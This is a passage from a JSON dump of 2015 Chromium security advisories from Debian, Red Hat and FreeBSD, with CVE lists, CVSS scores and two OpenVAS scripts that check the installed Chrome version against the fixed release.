2015 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : chromium-browser\r\nCVE ID : CVE-2015-1243 CVE-2015-1250\r\n\r\nSeveral vulnerabilities were discovered in the chromium web browser.\r\n\r\nCVE-2015-1243\r\n\r\n Saif El-Sherei discovered a use-after-free issue.\r\n\r\nCVE-2015-1250\r\n\r\n The chrome 42 team found and fixed multiple issues during internal\r\n auditing.\r\n\r\nFor the stable distribution (jessie), these problems have been fixed in\r\nversion 42.0.2311.135-1~deb8u1.\r\n\r\nFor the testing distribution (stretch), this problem will be fixed soon.\r\n\r\nFor the unstable distribution (sid), these problems have been fixed in\r\nversion 42.0.2311.135-1.\r\n\r\nWe recommend that you upgrade your chromium-browser packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: https://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1\r\n\r\niQQcBAEBCgAGBQJVQuVNAAoJELjWss0C1vRzAucf/AjbgLGoN7weS4+7U0AZnQhc\r\ngZqTdMYDxUO2cWikkJbGPdbUtKRz9PRle3YSsi9Ls5aSHnKTF1h99+Eor8eWBimV\r\nVRjYDC5bdF1x6rByA9NR3J6w7aCwFSQXYrsaJyGPrVR5I+4Hx3aDk6C9JKtq7iDd\r\nCX7cpk7GAUNbQixiw6/YQuevEZc/QcjM9i+wOMJD1agTQV6O9k0Ash8OsmMrX+xl\r\n8sO4upsRvFC5e+zc+ARbq5MCa/0sFRATd7w/biEg520hFhpTeXLZSu5FJwgqPbQF\r\n8TzDd/xQjKz71YO9Bt63Y0t6sivrKyJKbPJtjYmdRU4dzWEOUD6fC+MvsWvb5YjS\r\nBbeP2iRNZugQly/HhhTq163gbQOcizX2/yAZ73iEfWfmKuIsiIgh0Q1CYMNeHnJf\r\nVQ7pAOBMx+zsaAE8JD+dE4Mp8U2dUD3+kNwW9w1UDq59ax0LK7slJCiZUl2qcJIA\r\n/uLhcvfJRSGJ1n65obzKhzSgW/JkydYDWTeLOY4KrRARPkB0WrI8MgbNA8Cx6jOM\r\nV+hhhaHflsUcBFqB0SNMsLTUPvbKDhtqwhrWuCc+/h7h5na51aOyXB4BoiBYYgZj\r\nV3lcp3pwKsV0lVhBQbHKuJXX4J7bBYhoIxUhlmjppO46yWvWzW/lLeyFT+culiaP\r\nSTW0dngqmpLmX1WPaHosnmCpuVnCwpl5vQSNoHuiy1Oa8sZcw23byilNMH1ol8zP\r\n33tITma2j6QASCwu8SAOdH0iZaOHEtgrNiQqhFI4HcmJQNZudREF4YAsnE1NYvTW\r\nC9Q0b2L3emX7ylrJYF4RfmjYl5wU5mnxjVbhSQKbA3DjjKMPrZ1Cw3s4jhKMSLFP\r\nliPEmjogWULxU/XBGKB+EworO+TOJwpdMXEwSEtVXWdHWl4HfSw+oU1NQD6ruIW1\r\nUA4n56/vVGfAvKzVVxnVINFfuDl8shU734VGNGvxqqI4m7G8v0vTCM4e2an1bYfv\r\nZ3hr1ybMiFDfnTcMIp1agOM8lvXRjinfhy5Crbqxajx3fKJ/4QuVPQEtaC3nXbqD\r\ngVjFVb/lWQQaWJSPqcRUFSDLHt36WP5NGSkseXi1Y/jWhZd4RxWKPwUs4Qp1/0gf\r\nkZ+fLpnbNmRQETicrridR6IuAoEmcx4cyGpjJ8bRZCIGo8dhCsfkV3dagxqwSANJ\r\nirGWOkoJ/dpxS7uJ10NOaNzfigvbGg4xr9Fj2aZtJbakwNjtn6bHPO1VHka1/wWP\r\nsYcdYqtxXh6x6xA1X+0/IBFPcC5JVPUtBJRiGIEK85h8Hhib7SWbChxq2h5ZSOhz\r\nGgqsuCaf24q7RqBDAkwJZw+XnQYXZdcyGismEX03ZZzioSpTFG07KhsWWooK4Po=\r\n=oHz+\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2015-05-05T00:00:00", "title": "[SECURITY] [DSA 3242-1] chromium-browser security update", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-1250", "CVE-2015-1243"], "modified": "2015-05-05T00:00:00", "id": "SECURITYVULNS:DOC:31983", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31983", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2021-10-19T20:38:36", "description": "Chromium is an open-source web browser, powered by WebKit (Blink).\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Chromium to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nChromium. (CVE-2015-1251, CVE-2015-1252, CVE-2015-1253, CVE-2015-1254,\nCVE-2015-1255, CVE-2015-1256, CVE-2015-1257, CVE-2015-1258, CVE-2015-1259,\nCVE-2015-1260, CVE-2015-1261, CVE-2015-1262, CVE-2015-1263, CVE-2015-1264,\nCVE-2015-1265)\n\nAll Chromium users should upgrade to these updated packages, which contain\nChromium version 43.0.2357.65, which corrects these issues. After\ninstalling the update, Chromium must be restarted for the changes to take\neffect.\n", "cvss3": {}, "published": "2015-05-25T00:00:00", "type": "redhat", "title": "(RHSA-2015:1023) Important: chromium-browser security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1261", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"], "modified": "2018-06-07T05:04:24", "id": "RHSA-2015:1023", "href": "https://access.redhat.com/errata/RHSA-2015:1023", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-19T20:35:42", "description": "Chromium is an open-source web browser, powered by WebKit (Blink).\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Chromium to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nChromium.(CVE-2015-1235, CVE-2015-1236, CVE-2015-1237, CVE-2015-1238,\nCVE-2015-1240, CVE-2015-1241, CVE-2015-1242, CVE-2015-1244, CVE-2015-1245,\nCVE-2015-1246, CVE-2015-1247, CVE-2015-1248, CVE-2015-1249)\n\nAll Chromium users should upgrade to these updated packages, which contain\nChromium version 42.0.2311.90, which corrects these issues. After\ninstalling the update, Chromium must be restarted for the changes to take\neffect.\n", "cvss3": {}, "published": "2015-04-16T00:00:00", "type": "redhat", "title": "(RHSA-2015:0816) Important: chromium-browser security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1235", "CVE-2015-1236", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-1242", "CVE-2015-1244", "CVE-2015-1245", "CVE-2015-1246", "CVE-2015-1247", "CVE-2015-1248", "CVE-2015-1249"], "modified": "2018-06-07T05:04:21", "id": "RHSA-2015:0816", "href": "https://access.redhat.com/errata/RHSA-2015:0816", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-19T20:36:13", "description": "Chromium is an open-source web browser, powered by WebKit (Blink).\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Chromium to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nChromium. (CVE-2015-1243, CVE-2015-1250)\n\nThis update also fixes the following bug:\n\n* Prior to this update, Chromium did not accept GNOME's system proxy\nsettings due to having GConf support disabled. This issue has been resolved\nin this update. (BZ#1217065)\n\nAll Chromium users should upgrade to these updated packages, which contain\nChromium version 42.0.2311.135, which corrects these issues. After\ninstalling the update, Chromium must be restarted for the changes to take\neffect.\n", "cvss3": {}, "published": "2015-04-30T00:00:00", "type": "redhat", "title": "(RHSA-2015:0921) Important: chromium-browser security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1243", "CVE-2015-1250"], "modified": "2018-06-07T05:04:15", "id": "RHSA-2015:0921", "href": "https://access.redhat.com/errata/RHSA-2015:0921", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-19T20:36:56", "description": "Chromium is an open-source web browser, powered by WebKit (Blink).\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Chromium to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nChromium. (CVE-2015-1233, CVE-2015-1234)\n\nAll Chromium users should upgrade to these updated packages, which contain\nChromium version 41.0.2272.118, which corrects these issues. After\ninstalling the update, Chromium must be restarted for the changes to take\neffect.\n", "cvss3": {}, "published": "2015-04-06T00:00:00", "type": "redhat", "title": "(RHSA-2015:0778) Critical: chromium-browser security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1233", "CVE-2015-1234"], "modified": "2018-06-07T05:04:24", "id": "RHSA-2015:0778", "href": "https://access.redhat.com/errata/RHSA-2015:0778", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:32", "description": "\n\nGoogle Chrome Releases reports:\n\n37 security fixes in this release, including:\n\n[474029] High CVE-2015-1252: Sandbox escape in Chrome. Credit\n\t to anonymous.\n[464552] High CVE-2015-1253: Cross-origin bypass in DOM. Credit\n\t to anonymous.\n[444927] High CVE-2015-1254: Cross-origin bypass in Editing.\n\t Credit to armin@rawsec.net.\n[473253] High CVE-2015-1255: Use-after-free in WebAudio. Credit\n\t to Khalil Zhani.\n[478549] High CVE-2015-1256: Use-after-free in SVG. Credit to\n\t Atte Kettunen of OUSPG.\n[481015] High CVE-2015-1251: Use-after-free in Speech. Credit\n\t to SkyLined working with HP's Zero Day Initiative.\n[468519] Medium CVE-2015-1257: Container-overflow in SVG.\n\t Credit to miaubiz.\n[450939] Medium CVE-2015-1258: Negative-size parameter in\n\t libvpx. Credit to cloudfuzzer\n[468167] Medium CVE-2015-1259: Uninitialized value in PDFium.\n\t Credit to Atte Kettunen of OUSPG\n[474370] Medium CVE-2015-1260: Use-after-free in WebRTC. Credit\n\t to Khalil Zhani.\n[466351] Medium CVE-2015-1261: URL bar spoofing. Credit to Juho\n\t Nurminen.\n[476647] Medium CVE-2015-1262: Uninitialized value in Blink.\n\t Credit to miaubiz.\n[479162] Low CVE-2015-1263: Insecure download of spellcheck\n\t dictionary. Credit to Mike Ruddy.\n[481015] Low CVE-2015-1264: Cross-site scripting in bookmarks.\n\t Credit to K0r3Ph1L.\n[489518] CVE-2015-1265: Various fixes from internal audits,\n\t fuzzing and other initiatives.\nMultiple vulnerabilities in V8 fixed at the tip of the 4.3\n\t branch (currently 4.3.61.21).\n\n\n\n", "cvss3": {}, "published": "2015-05-19T00:00:00", "type": "freebsd", "title": "chromium -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1261", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"], "modified": "2015-05-19T00:00:00", "id": "A9D456B4-FE4C-11E4-AD15-00262D5ED8EE", "href": "https://vuxml.freebsd.org/freebsd/a9d456b4-fe4c-11e4-ad15-00262d5ed8ee.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-19T15:51:32", "description": "\n\nGoogle Chrome Releases reports:\n\n45 new security fixes, including:\n\n[456518] High CVE-2015-1235: Cross-origin-bypass in HTML\n\t parser. Credit to anonymous.\n[313939] Medium CVE-2015-1236: Cross-origin-bypass in Blink.\n\t Credit to Amitay Dobo.\n[461191] High CVE-2015-1237: Use-after-free in IPC. Credit to\n\t Khalil Zhani.\n[445808] High CVE-2015-1238: Out-of-bounds write in Skia.\n\t Credit to cloudfuzzer.\n[463599] Medium CVE-2015-1240: Out-of-bounds read in WebGL.\n\t Credit to w3bd3vil.\n[418402] Medium CVE-2015-1241: Tap-Jacking. Credit to Phillip\n\t Moon and Matt Weston of Sandfield Information Systems.\n[460917] High CVE-2015-1242: Type confusion in V8. Credit to\n\t fcole@onshape.com.\n[455215] Medium CVE-2015-1244: HSTS bypass in WebSockets.\n\t Credit to Mike Ruddy.\n[444957] Medium CVE-2015-1245: Use-after-free in PDFium. Credit\n\t to Khalil Zhani.\n[437399] Medium CVE-2015-1246: Out-of-bounds read in Blink.\n\t Credit to Atte Kettunen of OUSPG.\n[429838] Medium CVE-2015-1247: Scheme issues in OpenSearch.\n\t Credit to Jann Horn.\n[380663] Medium CVE-2015-1248: SafeBrowsing bypass. Credit to\n\t Vittorio Gambaletta (VittGam).\n[476786] CVE-2015-1249: Various fixes from internal audits,\n\t fuzzing and other initiatives. Multiple vulnerabilities in V8\n\t fixed at the tip of the 4.2 branch (currently 4.2.77.14).\n\n\n\n", "cvss3": {}, "published": "2015-04-14T00:00:00", "type": "freebsd", "title": "chromium -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1235", "CVE-2015-1236", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-1242", "CVE-2015-1244", "CVE-2015-1245", "CVE-2015-1246", "CVE-2015-1247", "CVE-2015-1248", "CVE-2015-1249"], "modified": "2015-04-14T00:00:00", "id": "B57F690E-ECC9-11E4-876C-00262D5ED8EE", "href": "https://vuxml.freebsd.org/freebsd/b57f690e-ecc9-11e4-876c-00262d5ed8ee.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-19T15:51:32", "description": "\n\nGoogle Chrome Releases reports:\n\n5 security fixes in this release, including:\n\n[453279] High CVE-2015-1243: Use-after-free in DOM. Credit to\n\t Saif El-Sherei.\n[481777] CVE-2015-1250: Various fixes from internal audits,\n\t fuzzing and other initiatives.\n\n\n\n", "cvss3": {}, "published": "2015-04-28T00:00:00", "type": "freebsd", "title": "chromium -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1243", "CVE-2015-1250"], "modified": "2015-04-28T00:00:00", "id": "210F80B9-EDE4-11E4-81C4-00262D5ED8EE", "href": "https://vuxml.freebsd.org/freebsd/210f80b9-ede4-11e4-81c4-00262d5ed8ee.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-07-19T22:13:24", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-05-27T00:00:00", "type": "openvas", "title": "Google Chrome Multiple Vulnerabilities - 02 - May15 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1265", "CVE-2015-1257", "CVE-2015-1263", "CVE-2015-1251", "CVE-2015-1262", "CVE-2015-1260", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1259", "CVE-2015-1252", "CVE-2015-1256", "CVE-2015-3910", "CVE-2015-1258", "CVE-2015-1255", "CVE-2015-1264"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310805631", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805631", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Multiple Vulnerabilities - 02 - May15 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805631\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2015-1251\", \"CVE-2015-1252\", \"CVE-2015-1253\", \"CVE-2015-1254\",\n \"CVE-2015-1255\", \"CVE-2015-1256\", \"CVE-2015-1257\", \"CVE-2015-1258\",\n \"CVE-2015-1259\", \"CVE-2015-1260\", \"CVE-2015-1262\", \"CVE-2015-1263\",\n \"CVE-2015-1264\", \"CVE-2015-1265\", \"CVE-2015-3910\");\n script_bugtraq_id(74723);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-05-27 09:42:43 +0530 (Wed, 27 May 2015)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_name(\"Google Chrome Multiple Vulnerabilities - 02 - May15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to:\n\n - Multiple unspecified vulnerabilities in Google V8.\n\n - Use-after-free vulnerability in the SpeechRecognitionClient implementation\n in the Speech subsystem.\n\n - common/partial_circular_buffer.cc script in Google Chrome does not properly\n handle wraps.\n\n - Vulnerability in core/html/parser/HTMLConstructionSite.cpp in the DOM\n implementation in Blink, as used in Google Chrome.\n\n - Vulnerability in core/dom/Document.cpp in Blink, as used in Google Chrome\n which allows the inheritance of the designMode attribute.\n\n - Use-after-free vulnerability in\n content/renderer/media/webaudio_capturer_source.cc script in the WebAudio\n implementation.\n\n - Use-after-free vulnerability in the SVG implementation in Blink.\n\n - platform/graphics/filters/FEColorMatrix.cpp script in the SVG implementation\n in Blink.\n\n - Google Chrome relies on libvpx code that was not built with an appropriate\n size-limit value.\n\n - PDFium, as used in Google Chrome, does not properly initialize memory.\n\n - Multiple use-after-free vulnerabilities in\n content/renderer/media/user_media_client_impl.cc script in the WebRTC\n implementation.\n\n - Cross-site scripting (XSS) vulnerability in Google Chrome.\n\n - The Spellcheck API implementation in Google Chrome before does not use an\n HTTPS session for downloading a Hunspell dictionary.\n\n - platform/fonts/shaping/HarfBuzzShaper.cpp script in Blink, does not\n initialize a certain width field.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause a denial of service, inject arbitrary web script, spoof the\n URL bar or deliver misleading popup content, bypass the Same Origin Policy and\n a sandbox protection mechanism, execute arbitrary code and allow\n man-in-the-middle attackers to deliver incorrect spelling suggestions or\n possibly have unspecified other impact via crafted dimensions.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to\n 43.0.2357.65 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 43.0.2357.65 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.in/2015/05/stable-channel-update_19.html\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_portable_win.nasl\");\n script_mandatory_keys(\"GoogleChrome/Win/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chromeVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chromeVer, test_version:\"43.0.2357.65\"))\n{\n report = 'Installed version: ' + chromeVer + '\\n' +\n 'Fixed version: 43.0.2357.65' + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T22:14:07", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-05-27T00:00:00", "type": "openvas", "title": "Google Chrome Multiple Vulnerabilities - 02 - May15 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1265", "CVE-2015-1257", "CVE-2015-1263", "CVE-2015-1251", "CVE-2015-1262", "CVE-2015-1260", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1259", "CVE-2015-1252", "CVE-2015-1256", "CVE-2015-3910", "CVE-2015-1258", "CVE-2015-1255", "CVE-2015-1264"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310805633", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805633", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Multiple Vulnerabilities - 02 - May15 (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805633\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2015-1251\", \"CVE-2015-1252\", \"CVE-2015-1253\", \"CVE-2015-1254\",\n \"CVE-2015-1255\", \"CVE-2015-1256\", \"CVE-2015-1257\", \"CVE-2015-1258\",\n \"CVE-2015-1259\", \"CVE-2015-1260\", \"CVE-2015-1262\", \"CVE-2015-1263\",\n \"CVE-2015-1264\", \"CVE-2015-1265\", \"CVE-2015-3910\");\n script_bugtraq_id(74723);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-05-27 09:42:43 +0530 (Wed, 27 May 2015)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_name(\"Google Chrome Multiple Vulnerabilities - 02 - May15 (Linux)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to:\n\n - Multiple unspecified vulnerabilities in Google V8.\n\n - Use-after-free vulnerability in the SpeechRecognitionClient implementation\n in the Speech subsystem.\n\n - common/partial_circular_buffer.cc script in Google Chrome does not properly\n handle wraps.\n\n - Vulnerability in core/html/parser/HTMLConstructionSite.cpp in the DOM\n implementation in Blink, as used in Google Chrome.\n\n - Vulnerability in core/dom/Document.cpp in Blink, as used in Google Chrome\n which allows the inheritance of the designMode attribute.\n\n - Use-after-free vulnerability in\n content/renderer/media/webaudio_capturer_source.cc script in the WebAudio\n implementation.\n\n - Use-after-free vulnerability in the SVG implementation in Blink.\n\n - platform/graphics/filters/FEColorMatrix.cpp script in the SVG implementation\n in Blink.\n\n - Google Chrome relies on libvpx code that was not built with an appropriate\n size-limit value.\n\n - PDFium, as used in Google Chrome, does not properly initialize memory.\n\n - Multiple use-after-free vulnerabilities in\n content/renderer/media/user_media_client_impl.cc script in the WebRTC\n implementation.\n\n - Cross-site scripting (XSS) vulnerability in Google Chrome.\n\n - The Spellcheck API implementation in Google Chrome before does not use an\n HTTPS session for downloading a Hunspell dictionary.\n\n - platform/fonts/shaping/HarfBuzzShaper.cpp script in Blink, does not\n initialize a certain width field.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause a denial of service, inject arbitrary web script, spoof the\n URL bar or deliver misleading popup content, bypass the Same Origin Policy and\n a sandbox protection mechanism, execute arbitrary code and allow\n man-in-the-middle attackers to deliver incorrect spelling suggestions or\n possibly have unspecified other impact via crafted dimensions.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to\n 43.0.2357.65 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 43.0.2357.65 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.in/2015/05/stable-channel-update_19.html\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"Google-Chrome/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chromeVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chromeVer, test_version:\"43.0.2357.65\"))\n{\n report = 'Installed version: ' + chromeVer + '\\n' +\n 'Fixed version: 43.0.2357.65' + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:16", "description": "Several vulnerabilities were discovered in the chromium web browser.\n\nCVE-2015-1251\nSkyLined discovered a use-after-free issue in speech\nrecognition.\n\nCVE-2015-1252\nAn out-of-bounds write issue was discovered that could be used 